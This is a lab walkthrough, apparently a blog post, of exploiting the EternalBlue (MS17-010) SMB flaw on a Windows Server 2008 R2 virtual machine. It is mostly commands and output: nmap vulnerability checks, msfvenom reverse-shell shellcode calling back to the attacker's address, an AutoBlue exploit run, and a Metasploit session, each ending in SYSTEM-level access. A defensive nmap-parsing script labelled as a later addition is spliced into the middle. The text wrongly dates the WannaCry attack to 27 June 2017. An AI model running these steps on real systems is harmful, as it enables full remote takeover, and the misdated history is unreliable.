Exploiting Windows MS17-010 SMB Vulnerability (EternalBlue)
MS17-010 EternalBlue Exploitation
EternalBlue (MS17-010/CVE-2017-0144) is the name given to a collection of Windows vulnerabilities and exploits that allow an attacker to remotely execute arbitrary code and gain access to a Windows system, and through it to the network the target system sits on.
The EternalBlue exploit was developed by the NSA (National Security Agency) to take advantage of the MS17-010 vulnerability, and was leaked to the public in 2017 by a hacker group called the Shadow Brokers.
EternalBlue exploits a vulnerability in the Windows SMBv1 protocol that allows an attacker to send specially crafted packets which lead to the execution of arbitrary commands.
The EternalBlue exploit was used in the WannaCry ransomware attack of 27 June 2017 to compromise other Windows systems over the network, with the aim of spreading the ransomware to as many systems as possible.
This vulnerability affects multiple versions of Windows:
- Windows Vista
- Windows 7
- Windows Server 2008
- Windows 8.1
- Windows Server 2012
- Windows 10
- Windows Server 2016
Microsoft released a patch for the vulnerability in March 2017; however, many users and companies still have not patched their systems.
There is an MSF auxiliary module that can be used to check whether a target system is vulnerable to EternalBlue, and an exploit module that can be used to exploit the vulnerability on unpatched systems.
The EternalBlue exploit module can be used against a vulnerable Windows system, giving us a privileged Meterpreter session on the target.
Besides the MSF modules, we can also exploit the vulnerability manually using the publicly available exploit code.
Tools & Environment
AutoBlue-MS17-010: https://github.com/3ndG4me/AutoBlue-MS17-010
Target system: Windows Server 2008 R2
Penetration Testing distribution: Kali Linux
Demo: Exploiting Windows MS17-010 SMB Vulnerability (EternalBlue)
sudo nmap -sV -p 445 -O 10.10.10.12
To identify whether the target is affected by EternalBlue, use the nmap NSE script smb-vuln-ms17-010, which the nmap documentation describes as follows:
Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.
The script connects to the $IPC tree, executes a transaction on FID 0 and checks whether the error "STATUS_INSUFF_SERVER_RESOURCES" is returned to determine that the target is not patched against ms17-010. Additionally, it checks for the known error codes returned by patched systems.
sudo nmap -sV -p 445 --script=smb-vuln-ms17-010 10.10.10.12
ls -al
cd shellcode
ls
chmod +x shell_prep.sh
./shell_prep.sh
y
10.10.10.10
1234
1234
1
1
ls -al
sc_x64.bin
sc_x86.bin
nc -nvlp 1234
cd ..
chmod +x eternalblue_exploit7.py
ls -al
python eternalblue_exploit7.py 10.10.10.12 shellcode/sc_x64.bin
nc -nvlp 1234
C:\Windows\system32>whoami
whoami
nt authority\system
msfconsole
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.10.12
exploit
meterpreter > sysinfo
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Home Lab
Environment: Windows Server 2008 R2 Standard
Source: https://msdn.itellyou.cn/
Name: Windows Server 2008 R2 Standard, Enterprise, Datacenter, and Web (x64) - DVD (Chinese-Simplified)
Download method: Xunlei (Thunder)
Link:
ed2k://|file|cn_windows_server_2008_r2_standard_enterprise_datacenter_web_x64_dvd_x15-50360.iso|3270336512|994401AF40CF454135F4F9510829405D|/
┌──(root㉿kali)-[~]
└─# nmap -sV -O 192.168.248.152
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-06 05:33 EDT
Nmap scan report for 192.168.248.152
Host is up (0.00022s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:F7:9E:3F (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.71 seconds
┌──(root㉿kali)-[~]
└─# nmap -sV -p 445 --script=smb-vuln-ms17-010 192.168.248.152
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-06 05:42 EDT
Nmap scan report for 192.168.248.152
Host is up (0.00030s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
MAC Address: 00:0C:29:F7:9E:3F (VMware)
Service Info: OS: Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.40 seconds
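The NSE output above is what a defender has to triage across a whole subnet, so it is worth turning into structured findings. The following Python is an added example, not part of the original post and not code from nmap or AutoBlue: it parses the smb-vuln-ms17-010 output (plus the "Running:" OS guess that an -O scan prints) into one finding per host, and lists the hosts that need patching or verification. The three-host sample is constructed from the output format shown above; the hostname lab-dc and the addresses 192.168.248.150 and 192.168.248.151 are assumptions.

```python
"""Triage nmap smb-vuln-ms17-010 output (added example; not from the post or nmap)."""
import re
from dataclasses import dataclass, field
from typing import List

# Windows versions the post lists as affected. A host whose nmap OS guess
# ("Running:" line) names one of them and exposes SMB is flagged for follow-up
# even before the NSE script has confirmed anything.
AFFECTED_OS_KEYWORDS = ("Vista", "7", "2008", "8.1", "2012", "10", "2016")

# Constructed sample: first host copies the scan above, the other two are assumed.
SAMPLE_SCAN = """\
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-06 05:42 EDT
Nmap scan report for 192.168.248.152
Host is up (0.00030s latency).
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
MAC Address: 00:0C:29:F7:9E:3F (VMware)
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     Disclosure date: 2017-03-14
|_    https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap scan report for lab-dc (192.168.248.150)
Host is up (0.00040s latency).
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Running: Microsoft Windows 7|2008|8.1
Nmap scan report for 192.168.248.151
Host is up (0.00020s latency).
PORT    STATE  SERVICE      VERSION
445/tcp closed microsoft-ds
Nmap done: 3 IP addresses (3 hosts up) scanned in 6.40 seconds
"""


@dataclass
class Finding:
    host: str
    smb_open: bool = False
    service: str = ""
    os_guess: str = ""
    state: str = "NOT REPORTED"  # nmap prints the NSE block only when it finds the bug
    cves: List[str] = field(default_factory=list)
    risk: str = ""

    @property
    def possibly_affected(self) -> bool:
        # Crude match of the OS fingerprint, e.g. "Microsoft Windows 7|2008|8.1"
        tokens = re.split(r"[|\s]+", self.os_guess)
        return self.smb_open and any(t in AFFECTED_OS_KEYWORDS for t in tokens)


def parse_scan(text: str) -> List[Finding]:
    """Walk the nmap text output and build one Finding per 'scan report' block."""
    findings: List[Finding] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"Nmap scan report for (.+)", line)
        if m:
            target = m.group(1)
            ip = re.search(r"\(([\d.]+)\)$", target)  # "name (1.2.3.4)" form
            current = Finding(host=ip.group(1) if ip else target)
            findings.append(current)
            continue
        if current is None:
            continue
        m = re.match(r"445/tcp\s+(\S+)\s+\S+\s*(.*)", line)
        if m:
            current.smb_open = m.group(1) == "open"
            current.service = m.group(2).strip()
        elif line.startswith("Running:"):
            current.os_guess = line.split(":", 1)[1].strip()
        elif line.startswith("|"):
            body = line.lstrip("|_ ").strip()  # drop the NSE output prefix
            if body.startswith("State:"):
                current.state = body.split(":", 1)[1].strip()
            elif body.startswith("IDs:"):
                current.cves.extend(re.findall(r"CVE-\d{4}-\d+", body))
            elif body.startswith("Risk factor:"):
                current.risk = body.split(":", 1)[1].strip()
    return findings


def vulnerable_hosts(findings: List[Finding]) -> List[str]:
    """Hosts the NSE script positively confirmed as unpatched."""
    return [f.host for f in findings if f.state == "VULNERABLE"]


def needs_attention(findings: List[Finding]) -> List[str]:
    """Confirmed vulnerable hosts plus SMB-exposed hosts on an affected OS."""
    return [f.host for f in findings if f.state == "VULNERABLE" or f.possibly_affected]


if __name__ == "__main__":
    for f in parse_scan(SAMPLE_SCAN):
        print(f"{f.host:16} smb_open={f.smb_open!s:5} state={f.state:13} cves={f.cves}")
    print("patch now:", vulnerable_hosts(parse_scan(SAMPLE_SCAN)))
```

Run it against saved scans with `python3 triage.py < scan.txt` after swapping SAMPLE_SCAN for stdin; the "NOT REPORTED" state is deliberate, since the script stays silent on hosts where the check did not fire, which is not the same as a host being patched.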
┌──(root㉿kali)-[~/Windows/exploiting/AutoBlue-MS17-010/shellcode]
└─# ./shell_prep.sh
_.-;;-._
'-..-'| || |
'-..-'|_.-;;-._|
'-..-'| || |
'-..-'|_.-''-._|
Eternal Blue Windows Shellcode Compiler
Let's compile them windoos shellcodezzz
Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
192.168.248.148
LPORT you want x64 to listen on:
1234
LPORT you want x86 to listen on:
1234
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=192.168.248.148 LPORT=1234
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin
Generating x86 cmd shell (stageless)...
msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=192.168.248.148 LPORT=1234
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin
MERGING SHELLCODE WOOOO!!!
DONE
┌──(root㉿kali)-[~/Windows/exploiting/AutoBlue-MS17-010/shellcode]
└─# ls -al
total 88
drwxr-xr-x 2 root root 4096 Oct 6 06:15 .
drwxr-xr-x 4 root root 4096 Oct 6 06:06 ..
-rw-r--r-- 1 root root 20305 Oct 6 06:06 eternalblue_kshellcode_x64.asm
-rw-r--r-- 1 root root 19862 Oct 6 06:06 eternalblue_kshellcode_x86.asm
-rw-r--r-- 1 root root 1598 Oct 6 06:06 eternalblue_sc_merge.py
-rw-r--r-- 1 root root 2205 Oct 6 06:15 sc_all.bin
-rw-r--r-- 1 root root 1232 Oct 6 06:15 sc_x64.bin
-rw-r--r-- 1 root root 772 Oct 6 06:13 sc_x64_kernel.bin
-rw-r--r-- 1 root root 460 Oct 6 06:15 sc_x64_msf.bin
-rw-r--r-- 1 root root 962 Oct 6 06:15 sc_x86.bin
-rw-r--r-- 1 root root 638 Oct 6 06:13 sc_x86_kernel.bin
-rw-r--r-- 1 root root 324 Oct 6 06:15 sc_x86_msf.bin
-rwxr-xr-x 1 root root 4557 Oct 6 06:06 shell_prep.sh
┌──(root㉿kali)-[~/Windows/exploiting/AutoBlue-MS17-010/shellcode]
└─# cd ..
┌──(root㉿kali)-[~/Windows/exploiting/AutoBlue-MS17-010]
└─# ls
eternalblue_exploit10.py eternalblue_exploit7.py eternalblue_exploit8.py eternal_checker.py LICENSE listener_prep.sh mysmb.py README.md requirements.txt shellcode zzz_exploit.py
┌──(root㉿kali)-[~/Windows/exploiting/AutoBlue-MS17-010]
└─# chmod +x eternalblue_exploit7.py
┌──(root㉿kali)-[~/Windows/exploiting/AutoBlue-MS17-010]
└─# ls -al
total 200
drwxr-xr-x 4 root root 4096 Oct 6 06:06 .
drwxr-xr-x 3 root root 4096 Oct 6 06:06 ..
-rw-r--r-- 1 root root 26444 Oct 6 06:06 eternalblue_exploit10.py
-rwxr-xr-x 1 root root 25741 Oct 6 06:06 eternalblue_exploit7.py
-rw-r--r-- 1 root root 24106 Oct 6 06:06 eternalblue_exploit8.py
-rw-r--r-- 1 root root 2801 Oct 6 06:06 eternal_checker.py
drwxr-xr-x 8 root root 4096 Oct 6 06:06 .git
-rw-r--r-- 1 root root 1070 Oct 6 06:06 LICENSE
-rwxr-xr-x 1 root root 3853 Oct 6 06:06 listener_prep.sh
-rw-r--r-- 1 root root 25725 Oct 6 06:06 mysmb.py
-rw-r--r-- 1 root root 5352 Oct 6 06:06 README.md
-rw-r--r-- 1 root root 8 Oct 6 06:06 requirements.txt
drwxr-xr-x 2 root root 4096 Oct 6 06:15 shellcode
-rw-r--r-- 1 root root 49249 Oct 6 06:06 zzz_exploit.py
┌──(root㉿kali)-[~]
└─# nc -nvlp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
┌──(root㉿kali)-[~/Windows/exploiting/AutoBlue-MS17-010]
└─# python eternalblue_exploit7.py 192.168.248.152 shellcode/sc_x64.bin
shellcode size: 1232
numGroomConn: 13
Target OS: Windows Server 2008 R2 Standard 7600
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
┌──(root㉿kali)-[~]
└─# nc -nvlp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.248.152.
Ncat: Connection from 192.168.248.152:49159.
Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Windows\system32>whoami
whoami
nt authority\system
Alternatively, use msfconsole: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
The module description reads: This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by the Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, where there is a mathematical error when a DWORD is subtracted into a WORD. The kernel pool is groomed so that the overflow is well laid out to overwrite an SMBv1 buffer. The actual RIP hijack is completed later in srvnet!SrvNetWskReceiveComplete. This exploit, like the original, may not trigger 100% of the time and should be run continuously until it triggers. The pool seems to go through hot streaks and needs a cool-down period before it works again. By default the module attempts an anonymous login to authenticate and perform the exploit. If the user supplies credentials in the SMBUser, SMBPass and SMBDomain options, it uses those instead. On some systems this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads.
┌──(root㉿kali)-[~]
└─# msfconsole -q
msf6 > search eternalblue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.248.148 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.248.152
RHOSTS => 192.168.248.152
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.248.148:4444
[*] 192.168.248.152:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.248.152:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7600 x64 (64-bit)
[*] 192.168.248.152:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.248.152:445 - The target is vulnerable.
[*] 192.168.248.152:445 - Connecting to target for exploitation.
[+] 192.168.248.152:445 - Connection established for exploitation.
[+] 192.168.248.152:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.248.152:445 - CORE raw buffer dump (36 bytes)
[*] 192.168.248.152:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.248.152:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 192.168.248.152:445 - 0x00000020 37 36 30 30 7600
[+] 192.168.248.152:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.248.152:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.248.152:445 - Sending all but last fragment of exploit packet
[*] 192.168.248.152:445 - Starting non-paged pool grooming
[+] 192.168.248.152:445 - Sending SMBv2 buffers
[+] 192.168.248.152:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.248.152:445 - Sending final SMBv2 buffers.
[*] 192.168.248.152:445 - Sending last fragment of exploit packet!
[*] 192.168.248.152:445 - Receiving response from exploit packet
[+] 192.168.248.152:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.248.152:445 - Sending egg to corrupted connection.
[*] 192.168.248.152:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 192.168.248.152
[+] 192.168.248.152:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.248.152:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.248.152:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (192.168.248.148:4444 -> 192.168.248.152:49160) at 2022-10-06 06:42:56 -0400
meterpreter > sysinfo
Computer : WIN-4QCPUB6FIVL
OS : Windows 2008 R2 (6.1 Build 7600).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM